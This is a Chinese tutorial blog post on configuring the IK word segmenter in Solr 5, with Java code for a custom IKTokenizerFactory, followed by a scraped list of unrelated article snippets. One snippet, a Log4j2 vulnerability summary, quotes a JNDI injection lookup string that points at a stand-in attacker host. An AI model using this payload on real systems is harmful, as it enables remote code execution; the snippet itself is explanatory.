lxwt909

跟益达学Solr5之使用IK分词器

在Solr中该如何使用IK分词器呢，这是小伙伴们问的频率比较高的一个问题，今晚特此更新此篇博客。其实之前我在其他博客里已经使用了IK分词器，只是我没做详细说明。

在schema.xml配置中其实有很多关于分词器的配置示例，我从中摘录一段配置示例，比如：

<fieldType name="text_general" class="solr.TextField" positionIncrementGap="100">
      <analyzer type="index">
        <tokenizer class="solr.StandardTokenizerFactory"/>
        <filter class="solr.StopFilterFactory" ignoreCase="true" words="stopwords.txt" />
        <!-- in this example, we will only use synonyms at query time
        <filter class="solr.SynonymFilterFactory" synonyms="index_synonyms.txt" ignoreCase="true" expand="false"/>
        -->
        <filter class="solr.LowerCaseFilterFactory"/>
      </analyzer>
      <analyzer type="query">
        <tokenizer class="solr.StandardTokenizerFactory"/>
        <filter class="solr.StopFilterFactory" ignoreCase="true" words="stopwords.txt" />
        <filter class="solr.SynonymFilterFactory" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
        <filter class="solr.LowerCaseFilterFactory"/>
      </analyzer>
    </fieldType>

fileType是用来定义域类型的，name即表示域名称，class即表示域类型对应的class类，如果是solr内置的域类型则可以直接使用solr.前缀+域类型的类名即可，如果是你自定义的域类型，则class表示自定义域类型的完整类名(包含完整的包路径)，在fileType元素下有analyzer元素，用来配置当前域类型使用什么分词器，你肯定很奇怪，为什么要配置两个analyzer，其实主要是为了区分两个阶段：索引建立阶段和Query查询阶段，索引建立阶段需要分词毋庸置疑，查询阶段是否需要分词，则取决于你的业务需求，用过Google的知道，用户在查询输入框里输入查询关键字，这时候我们需要对用户输入的查询关键字进行分词器，这时候我们就需要配置查询阶段使用什么分词器，为什么把分开配置？两者可以使用统一配置不行吗，配置两遍不是显得很冗余且繁琐吗？analyzer的type元素就表示这两个阶段，之所以要分阶段配置分词器，是为了满足用户潜在的需求，因为查询阶段的分词需求和索引阶段的分词需求不一定是相同的。我们都知道分词器Analyzer是由一个Tokenizer + N个tokenFilter组成，这就是为什么analyzer元素下会有tokenizer元素和filter元素，但tokenizer元素只允许有一个，filter元素可以有N个。之所以这样设计是为了为用户提供更细粒度的方式来配置分词器的行为，即你可以任意组合tokenizer和filter来实现你的特定需求，当然你也可以把这种组合写在Analyzer类里，然后直接在analyzer元素的class属性里配置自定义分词器的完整类名，这样就不需要这么繁琐的配置tokenizer和filter，即把实现细节屏蔽在analyzer类内部，但这样做的话，如果你需要更改实现细节，则需要修改Analyzer源码，然后重新打包成jar，相对来说，比较麻烦点，而使用analyzer，tokenizer,filter这样来配置，虽然繁琐点，但更灵活。而且采用<analyzer class="xxxxxxxx.IKAnalyzer"这样配置方式，看起来是比较简洁，我想你可能会比较喜欢这种方式，遗憾的是，solr在实现这种方式的时候，考虑不够周全，比如IKAnalyzer分词器，我们都知道IK分词器的构造器还有个useSmart参数，表示是否开启智能分词，而<analyzer class="xxxxxxxx.IKAnalyzer"这种方式，本质还是通过SAX方式解析XML，然后得到class类型字符串，然后通过反射去创建Analyzer实例对象，你可能会问我，我为什么知道是这样实现的？我看了Solr的源码所以我知道，无码无真相，来看截图：(在FieldTypePluginLoader类中)

关键点部分我已经使用红色方框标注出来了，class.newInstance()本质就是通过反射的方式去调用类的无参构造函数，这个大家都知道吧，而IKAnalyzer分词器的构造函数代码如图：

这意味着useSmart参数永远得不到设置，它永远为false,这就是采用<analyzer class="xxxxxxxx.IKAnalyzer"这种方式进行配置的弊端。它看似非常简洁，但暗藏陷阱，坑爹的Solr。那有没办法解决呢？我能想到的办法就是修改源码重新打包，你可能会问怎么修改？听我慢慢说，不要急。

在FieldTypePluginLoader类中有个readAnalyzer(Node node)方法，其中有一句代码非常关键：

NamedNodeMap attrs = node.getAttributes();
String analyzerName = DOMUtil.getAttr(attrs,"class");

其中node对象即表示当前<analyzer元素节点，而DOMUtil.getAttr(attrs,"class");表示通过DOMUtil工具类来获取<analyzer元素的class属性，这个好理解吧，我们在schema.xml中可能是这样配置的

<analyzer class="xxxxx.IKAnalyzer",那一句目的就是获取分词器的class类名,知道类名了就可以反射去创建分词器实例对象啊，就这么简单，所以我们可以自己在<analyzer元素中加一个参数，比如这样：

<analyzer class="org.wltea.analyzer.lucene.IKAnalyzer" useSmart="true"/>

然后我们在代码里String useSmart = DOMUtil.getAttr(attrs,"useSmart");就可以获取到属性值了，然后就是通过反射把属性值设置到IKAnalyzer类的useSmart属性中了，这是基本的Java反射操作，下面我提供几个反射工具方法：

/**
	 * 循环向上转型, 获取对象的DeclaredField. 若向上转型到Object仍无法找到, 返回null.
	 */
	protected static Field getDeclaredField(final Object object, final String fieldName) {
		if (null == object || null == fieldName || fieldName.equals("")) {
			return null;
		}
		for (Class<?> superClass = object.getClass(); superClass != Object.class; superClass = superClass.getSuperclass()) {
			try {
				return superClass.getDeclaredField(fieldName);
			} catch (NoSuchFieldException e) {
				// Field不在当前类定义,继续向上转型
				continue;
			}
		}
		return null;
	}



/**
	 * 直接设置对象属性值, 无视private/protected修饰符, 不经过setter函数.
	 */
	public static void setFieldValue(final Object object, final String fieldName, final Object value) {
		Field field = getDeclaredField(object, fieldName);
		if (field == null) {
			throw new IllegalArgumentException("Could not find field [" + fieldName + "] on target [" + object + "]");
		}
		makeAccessible(field);
		try {
			field.set(object, value);
		} catch (IllegalAccessException e) {
			throw new RuntimeException("直接设置对象属性值出现异常", e);
		}
	}




/**
	 * 强行设置Field可访问
	 */
	protected static void makeAccessible(final Field field) {
		if (!Modifier.isPublic(field.getModifiers()) || !Modifier.isPublic(field.getDeclaringClass().getModifiers())) {
			field.setAccessible(true);
		}
	}

直接调用setFieldValue方法即可，比如在Analyzer analyzer = clazz.newInstance();这句下面添加一句

setFieldValue(analyzer,"useSmart",Boolean.valueOf(useSmart ));

这样我们在xml中配置的useSmart参数就设置到Analyzer类中了，这样才能起作用。solr源码如何导入Eclipse上篇博客里我已经介绍过了，至于如果把修改过后的代码打包成jar，直接使用eclipse自带的export功能即可，如图：

然后一路Next即可。我只是说说思路，剩下留给你们自己去实践。

但是采用改源码方式不是很优雅，因为你本地虽然是修改好了，哪天你由Solr5.1.0升级到5.2.0，还要再改一遍，没升级一次就要改一次，你的代码copy给别人用，别人运行代码后看不到效果，增加沟通成本，你还得把你改过源码的jar包共享给别人，这也就是为什么有那么多人找我要什么IK jar包。

在Solr中可以使用TokenizerFactory方式来解决我刚才提出的问题：IKAnalyzer分词器的useSmart参数无法通过schema.xml配置文件进行设置。我花了点时间扩展了IKTokenizerFactory类，代码如下：

package org.apache.lucene.analysis.ik;

import java.util.Map;

import org.apache.lucene.analysis.Tokenizer;
import org.apache.lucene.analysis.util.TokenizerFactory;
import org.apache.lucene.util.AttributeFactory;
import org.wltea.analyzer.lucene.IKTokenizer;

public class IKTokenizerFactory extends TokenizerFactory {
	public IKTokenizerFactory(Map<String, String> args) {
		super(args);
		useSmart = getBoolean(args, "useSmart", false);
	}
	private boolean useSmart;

	@Override
	public Tokenizer create(AttributeFactory attributeFactory) {
		Tokenizer tokenizer = new IKTokenizer(attributeFactory,useSmart);
		return tokenizer;
	}
}

同时我对IKTokenizer类也稍作了修改，修改后源码如下：

/**
 * IK分词器 Lucene Tokenizer适配器类
 * 兼容Lucene 4.0版本
 */
public final class IKTokenizer extends Tokenizer {
	
	//IK分词器实现
	private IKSegmenter _IKImplement;
	
	//词元文本属性
	private final CharTermAttribute termAtt;
	//词元位移属性
	private final OffsetAttribute offsetAtt;
	//词元分类属性（该属性分类参考org.wltea.analyzer.core.Lexeme中的分类常量）
	private final TypeAttribute typeAtt;
	//记录最后一个词元的结束位置
	private int endPosition;
	
	private Version version = Version.LATEST;
	/**
	 * Lucene 4.0 Tokenizer适配器类构造函数
	 * @param in
	 * @param useSmart
	 */
	public IKTokenizer(Reader in , boolean useSmart){
		//super(in);
	    offsetAtt = addAttribute(OffsetAttribute.class);
	    termAtt = addAttribute(CharTermAttribute.class);
	    typeAtt = addAttribute(TypeAttribute.class);
		_IKImplement = new IKSegmenter(input , useSmart);
	}
	
	public IKTokenizer(AttributeFactory factory, boolean useSmart) {
		super(factory);
		offsetAtt = addAttribute(OffsetAttribute.class);
	    termAtt = addAttribute(CharTermAttribute.class);
	    typeAtt = addAttribute(TypeAttribute.class);
		_IKImplement = new IKSegmenter(input , useSmart);
	}

	/* (non-Javadoc)
	 * @see org.apache.lucene.analysis.TokenStream#incrementToken()
	 */
	@Override
	public boolean incrementToken() throws IOException {
		//清除所有的词元属性
		clearAttributes();
		Lexeme nextLexeme = _IKImplement.next();
		if(nextLexeme != null){
			//将Lexeme转成Attributes
			//设置词元文本
			termAtt.append(nextLexeme.getLexemeText());
			//设置词元长度
			termAtt.setLength(nextLexeme.getLength());
			//设置词元位移
			offsetAtt.setOffset(nextLexeme.getBeginPosition(), nextLexeme.getEndPosition());
			//记录分词的最后位置
			endPosition = nextLexeme.getEndPosition();
			//记录词元分类
			typeAtt.setType(nextLexeme.getLexemeTypeString());			
			//返会true告知还有下个词元
			return true;
		}
		//返会false告知词元输出完毕
		return false;
	}
	
	/*
	 * (non-Javadoc)
	 * @see org.apache.lucene.analysis.Tokenizer#reset(java.io.Reader)
	 */
	@Override
	public void reset() throws IOException {
		super.reset();
		_IKImplement.reset(input);
	}	
	
	@Override
	public final void end() {
	    // set final offset
		int finalOffset = correctOffset(this.endPosition);
		offsetAtt.setOffset(finalOffset, finalOffset);
	}

修改后重新打包的IKAnalyzer jar请见底下的附件。

然后我把它打包成了solr-analyzer-ik-5.1.0.jar，只需要把这个jar包复制到你的core\lib目录下即可，然后你就可以像配置StandardTokenizerFactory一样的使用我们自定义的IKTokenizerFactory类了，并且能配置useSmart参数，这正是我想要的，能灵活的控制分词器参数，so cool。配置示例如下：

然后field域里应用我们配置的这个text_ik域类型，如图：

然后你还需要把IKAnalyzer jar包以及我们自定义的IKTokenizerFactory的jar包copy到你当前core\lib目录下，如图：

IKAnalyzer jar建议使用底下附件里我新上传的，因为源码我稍作了修改，上面已经提到过了。然后你需要把IKAnalyzer.cfg.xml配置文件copy到E:\apache-tomcat-7.0.55\webapps\solr\WEB-INF\classes目录下，其中E:\apache-tomcat-7.0.55为我的Tomcat安装根目录，请类比成你自己的tomcat安装根目录，你懂的。如图：

IKAnalyzer.cfg.xml配置如图：

ext.dic为IK分词器的自定义扩展词典，内容如图：

我就在里面加了两个自定义词语。

然后你就可以启动你的tomcat，然后如图进行分词测试了，

上图是用来测试useSmart参数设置是否有生效，如果你看到如图的效果，说明配置成功了。

上图是用来测试自定义词典是否有生效，因为我在ext.dic自定义词典里添加了劲爆和屌丝这两个词，所以IK能分出来，逆袭和白富美没有在自定义扩展词典里添加，所以IK分不出来。如果你能看到如图效果，说明IK的自定义扩展词典也配置成功了。到此，关于在Solr中使用IK分词器就介绍到这儿了，如果你还有任何疑问，请通过以下方式联系到我，谢谢！！！博客里提到的相关jar包配置文件等等资源文件，我待会儿都会上传到底下的附件里，特此提醒！！！！！

益达Q-Q: 7-3-6-0-3-1-3-0-5

益达的Q-Q群： 1-0-5-0-9-8-8-0-6

分布式搜索引擎Elasticsearch——基础敲代码的旺财架构进阶 elasticsearch java 搜索引擎 ES-head
文章目录一、Lucene与Solr与Elasticsearch二、ES核心术语三、ES核心概念四、倒排索引五、ES的安装（centos7）1、下载地址（这里安装linux版本）2、解压压缩包3、修改配置文件(1)修改核心配置文件(2)修改JVM配置文件4、启动ES(1)添加系统用户并授权(2)ES启动(3)修改配置文件(4)再次启动ES六、安装ES-head插件（可视化管理插件）1、使用谷歌市场安
Java 结合elasticsearch-ik分词器，实现评论的违规词汇脱敏等操作八百码 elasticsearch 大数据搜索引擎
IK分词（IKAnalyzer）是一款基于Java开发的中文分词工具，它结合了词典分词和基于统计的分词方法，旨在为用户提供高效、准确、灵活的中文分词服务。注意：需要自己建立一个敏感词库，然后自己选择方式同步到elasticsearch中，方便比对操作话不多说，直接上后台代码这个依赖是我使用的，可以结合自己的情况自己选择适用版本的相关依赖org.elasticsearchelasticsearcho
Java高级技术day75：Zookeeper与Dubbo 开源oo柒
一、Zookeeper的介绍1.Zookeeper介绍：顾名思义zookeeper就是动物园管理员，他是用来管hadoop（大象）、Hive(蜜蜂)、pig(小猪)的管理员，ApacheHbase和ApacheSolr的分布式集群都用到了zookeeper；Zookeeper:是一个分布式的、开源的程序协调服务，是hadoop项目下的一个子项目。他提供的主要功能包括：配置管理、名字服务、分布式锁、
Elasticsearch详解es 思静语 elasticsearch elasticsearch 大数据搜索引擎
文章目录概述es架构为什么要使用ElasticSearchElasticSearch的优势使用场景es为什么这么快倒排索引如何保证ES和数据库的数据一致性监听binlog同步双写elasticsearch是如何实现master选举的Elasticsearch与Solr的区别概述ES全称是ElasticSearch，它是一个建立在全文搜索引擎库Lucene基础上的开源搜索和分析引擎。ES它本身具有分
Java——ikanalyzer分词·只用自定义词库 weixin_30902251 java 数据库 c/c++
需要包：IKAnalyzer2012_FF_hf1.jarlucene-core-5.5.4.jar需要文件：IKAnalyzer.cfg.xmlext.dicstopword.dic整理好的下载地址：http://download.csdn.net/detail/talkwah/9770635importjava.io.IOException;importjava.io.StringReader
08、全文检索 -- Solr -- 使用 SolrClient 连接 Solr（演示手动配置自定义的SolrClient 并在测试类使用 solrClient 进行添加、查询、删除文档的操作） _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr lucene
目录SolrClientSolrClient的功能SolrClient这个API包含如下常用方法：SolrClient方法的说明：SpringBootStarterDataSolr的不足手动配置自定义的SolrClientSolrClient代码演示配置自定义的SolrClient1、创建一个SpringBoot项目，添加依赖2、SolrAutoConfiguration解析3、手动配置自定义的S
java 商城全文搜索_利用solr实现商品的搜索功能闲侃数码 java 商城全文搜索
后期补充：为什么要用solr服务，为什么要用luncence？问题提出：当我们访问购物网站的时候，我们可以根据我们随意所想的内容输入关键字就可以查询出相关的内容，这是怎么做到呢？这些随意的数据不可能是根据数据库的字段查询的，那是怎么查询出来的呢，为什么千奇百怪的关键字都可以查询出来呢？答案就是全文检索工具的实现，luncence采用了词元匹配和切分词。举个例子：北京天安门------luncenc
solr7集群 springboot_springboot 集成solr 骑lv上高速 solr7集群 springboot
一、版本介绍：jdk1.8tomcat8springboot2.1.3RELEASE(这里有坑,详见下文)solr7.4.0(没有选择最新的版本,是因为项目的boot版本是2.1.3,其对应的solr-solrj.jar版本是7.4.0，为避免出现不可预料不可抗拒不可解决的问题，谨慎选用与之一样版本)二、solr服务器搭建下载1.tomcat8的下载不赘述；2.solr下载：进入solr官网，找历
09、全文检索 -- Solr -- SpringBoot 整合 Spring Data Solr （生成DAO组件和实现自定义查询方法） _L_J_H_ #全文检索（Solr 和 Elasticsearch）spring 全文检索 solr
目录SpringBoot整合SpringDataSolrSpringDataSolr的功能（生成DAO组件）：SpringDataSolr大致包括如下几方面功能：@Query查询（属于半自动）代码演示：1、演示通过dao组件来保存文档1、实体类指定索引库2、修改日志级别3、创建Dao接口4、先删除所有文档5、创建测试类6、演示结果2、根据title_cn字段是否包含关键字来查询3、查询指定价格范围
vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）余生有个小酒馆 vulhub漏洞复现 apache log4j 安全
ApacheLog4j2是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。1.服务启动后，访问`http://your-ip:8983`即可查看到ApacheSolr的后台页面。2.`$
solr —— 1 全文检索Solr8.0第一部分苏打饼干没加心 solr
solr，毕设啊，快被写完吧1solr介绍什么是solrLucene与Solr与ES为什么要用slor2HelloWorld2.1项目安装部署2.2项目安装配置创建核心创建document(表)添加文件查询数据3solr后台管理页面详解控制面板5全文检索千万级别数据实战，全面剖析架构设计，大数据瓶颈突破6数据库导入索引BV1Dt411G7eF1solr介绍什么是solrsolr简化了程序员的操作L
（三十七）大数据实战——Solr服务的部署安装厉害哥哥吖大数据大数据 solr
前言Solr是一个基于ApacheLucene的开源搜索平台，它提供了强大的全文搜索、分布式搜索和数据分析功能。Solr可以用于构建高性能的搜索应用程序，支持从海量数据中快速检索和分析信息。Solr使用倒排索引和先进的搜索算法，可实现快速而准确的全文搜索。Solr可以在多个服务器上进行水平扩展，实现分布式搜索和负载均衡。Solr支持复杂的过滤、排序和范围查询，使您可以根据各种条件对搜索结果进行精确
ElasticSearch VS. Solr VS. Sphinx：最好的开源搜索引擎比较 chenxiyy3773 大数据人工智能数据库
译者按：本文是来自一家乌克兰技术公司的文章。该文章译者认为着重在应用上，而非单纯的性能对比。给自己的平台选择一个合适的搜索引擎比任何一个吹嘘技术强大的好。虽然最近一两年ES发展飞速，但sphinx的简单易用性还是赢得很多机构公司的青睐，比如优酷土豆都是用sphinx。所以使用之前，务必先了解自己的业务诉求，再选择合适的搜索引擎，而非一昧跟风。翻译若有误请指正，谢谢查看！编译自：ELASTICSEA
阿里P8架构师谈：开源搜索引擎Lucene、Solr、Sphinx等优劣势比较 liuhuiteng 中间件中间件
开源搜索引擎分类1.Lucene系搜索引擎，java开发,包括：LuceneSolrElasticsearchKatta、Compass等都是基于Lucene封装。你可以想象Lucene系有多强大。2.Sphinx搜素引擎，c++开发,简单高性能。以下重点介绍最常用的开源搜素引擎：Lucene、Solr、Elasticsearch、Sphinx的特点和优劣势选型比较。Lucene1.Lucene简
使用solr6.0搭建solrCloud 牛初九
使用solr6.0搭建solrCloud一、搭建zookeeper集群下载zookeeper压缩包到自己的目录并解压（本例中的目录在/opt下），zookeeper的根目录我们在这里用${ZK_HOME}表示。在${ZK_HOME}/conf下创建zoo.cfg文件，可以复制zoo_sample.cfg文件：cpzoo_sample.cfgzoo.cfg修改zoo.cfg的内容如下：vimzoo.
Error CREATEing SolrCore 'index': Unable to create core: index Caused by: No enum constant org.apach 杉斯狼后台 Java solr enum 索引 lucene
ErrorCREATEingSolrCore'index':Unabletocreatecore:indexCausedby:Noenumconstantorg.apache.lucene.util.Version.LUCENE_48出错原因：solr版本配置不正确解决方法：在索引文件的目录下conf>solrconfig.xml4.8将4.8修改为4.7（你具体的版本，可以参照collectio
solr 或查询 or query 杉斯狼 solr solr java web java lucene
MenuId:(472e44eaac735772ef44366OR80f24930dcf7131262d9OR51e8f9844f8bd1283ac)如上句，格式为key:(value1ORvalue2ORvalue3OR...)注意，OR必须为大写，同时两边各有一空格。
尚学堂102天总结+springdata-redis 人间草木为伴
102天行百里者半九十，想要在一个行业里成为顶尖人才，一定满足一万小时定律，要想学好JAVA，需要持之以恒不断地努力,每天都要勤思考+善于询问+解决问题!知识温故而知新>>>>>>Linux下安装solr的教程555.pngSpringBoot2.2以上版本添加junit进行测试的方法h111.pngMaven依赖中标签的作用image.png./的作用和用法image.png启动和关闭redis
开源大数据集群部署（九）Ranger审计日志集成（solr）大数据部署
作者：櫰木1、下载solr安装包并解压包tar-xzvfsolr-8.11.2.gzcdsolr-8.11.2执行安装脚本./bin/install_solr_service.sh/opt/solr-8.11.2.tgz安装后，会在/etc/default/下生成solr.in.sh文件。2、在rangeradmin下生成solr相关配置cd/opt/ranger-2.3.0-admin/cont
Lucene/Solr/Elasticsearch可视化工具luke的下载及使用景小悦 lucene luke elasticsearch solr
※※使用的luke版本一定与lucene一致，否则会出现问题。luke下载地址：https://github.com/DmitryKey/luke/releasesluke是一个用于Lucene/Solr/Elasticsearch搜索引擎，方便开发和诊断的GUI（可视化）工具。luke:Luke是查询LUCENE索引文件的工具，而且用Luke的Search可以做查询Lukeisahandydev
CVE-2017-12149漏洞复现黑客大佬漏洞复现 web安全安全网络 python
服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等1、中间件-Web
【知识整理】技术新人的培养计划卢卡上学文心一言 AIGC 人工智能 php 技术团队新人培养 git
一、培养计划落地实操1.概要新人入职，要给予适当的指导，目标：1、熟悉当前环境：生活环境：吃饭、交通、住宿、娱乐工作环境：使用的工具，Mac、maven、git、idea等2、熟悉并掌握工作技能：技术栈：Spring、Hibernate、Cache、Solr、MySQL（根据公司内部技术使用调整）内部协作工具：wiki（Confluence）、task（JIRA）、git（Stash）快捷操作：M
Apache Log4j2漏洞复现（反弹shell）安全菜 apache
0x01漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，ApacheStruts2、ApacheSolr、ApacheDruid、Apa
2021最新版 ElasticSearch 7.6.1 教程详解爬虫jsoup+es模拟京东搜索（狂神说） Super_Song_ 中间件 elasticsearch 搜索引擎 java nosql
文章目录一、ElasticSearch简介1.了解创始人DougCutting2.Lucene简介3.ElasticSearch简介4.ElasticSearch和Solr的区别5.了解ELK二、软件安装1.ElasticSearch2.ElasticSearchHead3.Kibana三、ElasticSearch使用详解1.ES核心概念文档索引倒排索引ik分词器2.命令模式的使用Rest风格说
大数据用户画像系统架构设计充电了么
文章目录一、用户画像数据仓库搭建、数据抽取部分二、大数据平台、用户画像集市分层设计、处理三、离线计算部分四、实时计算部分五、Solr/ES搜索引擎部分六、JavaWeb毫秒级实时用户画像接口服务七、用户画像实时展示异步触发获取Web自助后台总结用户画像是一个非常通用普遍使用的系统，从我们的架构图中可以看出，从数据计算时效性上来讲分离线计算和实时计算。离线计算一般是每天晚上全量计算所有用户，或者按需
Apache Log4j2 漏洞原理仲瑿漏洞原理 apache log4j java
ApacheLog4j远程代码执行漏洞1.漏洞危害ApacheLog4j被发现存在一处任意代码执行漏洞，由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。经验证，ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等众多组件与大型应用均受影响2.影响版本ApacheLog4j2.x<=2.14.13.漏
rm: relocation error: /lib64/libc.so.6: symbol _dl_starting_up, version GLIBC_PRIVATE not defined in feifeidata
由于安装glibc-2.23.tar.gz导致系统出错，命令不能用恢复方法：进入/usr/lib64目录，使用ls-ltr命令ls-ltrlrwxrwxrwx.1rootroot2112月1421:46ld-linux-x86-64.so.2->/usr/lib64/ld-2.17.solrwxrwxrwx.1rootroot2312月1421:51libc.so.6->/usr/lib64/li
安全漏洞(1)-Log4j2远程代码执行漏洞，log4j2漏洞验证迷途的小兵安全体系_加解密算法安全 log4j2 安全漏洞
漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。漏洞评级CVE-2021
揭秘Elasticsearch：一文读懂分布式搜索与分析引擎的核心概念超越不平凡 elasticsearch 分布式大数据
Elasticsearch是一个开源、分布式、实时搜索和分析引擎，专门用于处理大规模数据的快速检索与分析。它建立在ApacheLucene的基础上，但提供了比Lucene更为丰富的功能和友好的RESTfulAPI接口，使得开发者能够轻松地进行全文搜索、结构化搜索以及对海量数据进行复杂的聚合操作。Elasticsearch目前被广泛用于互联网多种领域中。一是搜索领域，相对于solr，成为很多搜索的不
07、全文检索 -- Solr -- Solr 全文检索之为索引库添加中文分词器 _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr 中文分词
目录Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词器的jar包2、修改managed-schema配置文件什么是fieldType3、添加停用词文档4、重启solr5、添加【*_cn】动态字段，并为该字段设置中文分词器6、演示分词器的区别演示text_cjk这个简单的分词器演示text_cn这个中文分词器Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词
HQL之投影查询归来朝歌 HQL Hibernate 查询语句投影查询
在HQL查询中，常常面临这样一个场景，对于多表查询，是要将一个表的对象查出来还是要只需要每个表中的几个字段，最后放在一起显示？针对上面的场景，如果需要将一个对象查出来： HQL语句写“from 对象”即可 Session session = HibernateUtil.openSession();
Spring整合redis bylijinnan redis
pom.xml <dependencies>  <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redi
org.hibernate.NonUniqueResultException: query did not return a unique result: 2 0624chenhong Hibernate
参考：http://blog.csdn.net/qingfeilee/article/details/7052736 org.hibernate.NonUniqueResultException: query did not return a unique result: 2 在项目中出现了org.hiber
android动画效果不懂事的小屁孩 android动画
前几天弄alertdialog和popupwindow的时候，用到了android的动画效果，今天专门研究了一下关于android的动画效果，列出来，方便以后使用。 Android 平台提供了两类动画。一类是Tween动画，就是对场景里的对象不断的进行图像变化来产生动画效果（旋转、平移、放缩和渐变）。第二类就是 Frame动画，即顺序的播放事先做好的图像，与gif图片原理类似。
js delete 删除机理以及它的内存泄露问题的解决方案换个号韩国红果果 JavaScript
delete删除属性时只是解除了属性与对象的绑定，故当属性值为一个对象时，删除时会造成内存泄露（其实还未删除）举例： var person={name:{firstname:'bob'}} var p=person.name delete person.name p.firstname -->'bob' // 依然可以访问p.firstname，存在内存泄露
Oracle将零干预分析加入网络即服务计划蓝儿唯美 oracle
由Oracle通信技术部门主导的演示项目并没有在本月较早前法国南斯举行的行业集团TM论坛大会中获得嘉奖。但是，Oracle通信官员解雇致力于打造一个支持零干预分配和编制功能的网络即服务（NaaS）平台，帮助企业以更灵活和更适合云的方式实现通信服务提供商（CSP）的连接产品。这个Oracle主导的项目属于TM Forum Live!活动上展示的Catalyst计划的19个项目之一。Catalyst计
spring学习——springmvc（二） a-john springMVC
Spring MVC提供了非常方便的文件上传功能。 1，配置Spring支持文件上传： DispatcherServlet本身并不知道如何处理multipart的表单数据，需要一个multipart解析器把POST请求的multipart数据中抽取出来，这样DispatcherServlet就能将其传递给我们的控制器了。为了在Spring中注册multipart解析器，需要声明一个实现了Mul
POJ-2828-Buy Tickets aijuans ACM_POJ
POJ-2828-Buy Tickets http://poj.org/problem?id=2828 线段树，逆序插入 #include<iostream>#include<cstdio>#include<cstring>#include<cstdlib>using namespace std;#define N 200010struct
Java Ant build.xml详解 asia007 build.xml
1,什么是antant是构建工具2,什么是构建概念到处可查到，形象来说，你要把代码从某个地方拿来，编译，再拷贝到某个地方去等等操作，当然不仅与此，但是主要用来干这个3,ant的好处跨平台 --因为ant是使用java实现的，所以它跨平台使用简单--与ant的兄弟make比起来语法清晰--同样是和make相比功能强大--ant能做的事情很多，可能你用了很久，你仍然不知道它能有
android按钮监听器的四种技术百合不是茶 android xml配置监听器实现接口
android开发中经常会用到各种各样的监听器,android监听器的写法与java又有不同的地方; 1,activity中使用内部类实现接口 ,创建内部类实例使用add方法与java类似创建监听器的实例 myLis lis = new myLis(); 使用add方法给按钮添加监听器
软件架构师不等同于资深程序员 bijian1013 程序员架构师架构设计
本文的作者Armel Nene是ETAPIX Global公司的首席架构师，他居住在伦敦，他参与过的开源项目包括 Apache Lucene,，Apache Nutch， Liferay 和 Pentaho等。如今很多的公司
TeamForge Wiki Syntax & CollabNet User Information Center sunjing TeamForge How do Attachement Anchor Wiki Syntax
the CollabNet user information center http://help.collab.net/ How do I create a new Wiki page? A CollabNet TeamForge project can have any number of Wiki pages. All Wiki pages are linked, and
【Redis四】Redis数据类型 bit1129 redis
概述 Redis是一个高性能的数据结构服务器，称之为数据结构服务器的原因是，它提供了丰富的数据类型以满足不同的应用场景，本文对Redis的数据类型以及对这些类型可能的操作进行总结。 Redis常用的数据类型包括string、set、list、hash以及sorted set.Redis本身是K/V系统，这里的数据类型指的是value的类型，而不是key的类型，key的类型只有一种即string
SSH2整合-附源码白糖_ eclipse spring tomcat Hibernate Google
今天用eclipse终于整合出了struts2+hibernate+spring框架。我创建的是tomcat项目，需要有tomcat插件。导入项目以后，鼠标右键选择属性，然后再找到“tomcat”项，勾选一下“Is a tomcat project”即可。具体方法见源码里的jsp图片，sql也在源码里。补充1：项目中部分jar包不是最新版的，可能导
[转]开源项目代码的学习方法 braveCS 学习方法
转自： http://blog.sina.com.cn/s/blog_693458530100lk5m.html http://www.cnblogs.com/west-link/archive/2011/06/07/2074466.html 1）阅读features。以此来搞清楚该项目有哪些特性2）思考。想想如果自己来做有这些features的项目该如何构架3）下载并安装d
编程之美-子数组的最大和（二维） bylijinnan 编程之美
package beautyOfCoding; import java.util.Arrays; import java.util.Random; public class MaxSubArraySum2 { /** * 编程之美子数组之和的最大值（二维） */ private static final int ROW = 5; private stat
读书笔记-3 chengxuyuancsdn jquery笔记 resultMap配置 ibatis一对多配置
1、resultMap配置 2、ibatis一对多配置 3、jquery笔记 1、resultMap配置当<select resultMap="topic_data"> <resultMap id="topic_data">必须一一对应。 (1)<resultMap class="tblTopic&q
[物理与天文]物理学新进展 comsci
如果我们必须获得某种地球上没有的矿石,才能够进行某些能量输出装置的设计和建造,而要获得这种矿石,又必须首先进行深空探测,而要进行深空探测,又必须获得这种能量输出装置,这个矛盾的循环,会导致地球联盟在与宇宙文明建立关系的时候,陷入困境怎么办呢?
Oracle 11g新特性:Automatic Diagnostic Repository daizj oracle ADR
Oracle Database 11g的FDI（Fault Diagnosability Infrastructure）是自动化诊断方面的又一增强。 FDI的一个关键组件是自动诊断库（Automatic Diagnostic Repository-ADR）。在oracle 11g中，alert文件的信息是以xml的文件格式存在的，另外提供了普通文本格式的alert文件。这两份log文
简单排序:选择排序 dieslrae 选择排序
public void selectSort(int[] array){ int select; for(int i=0;i<array.length;i++){ select = i; for(int k=i+1;k<array.leng
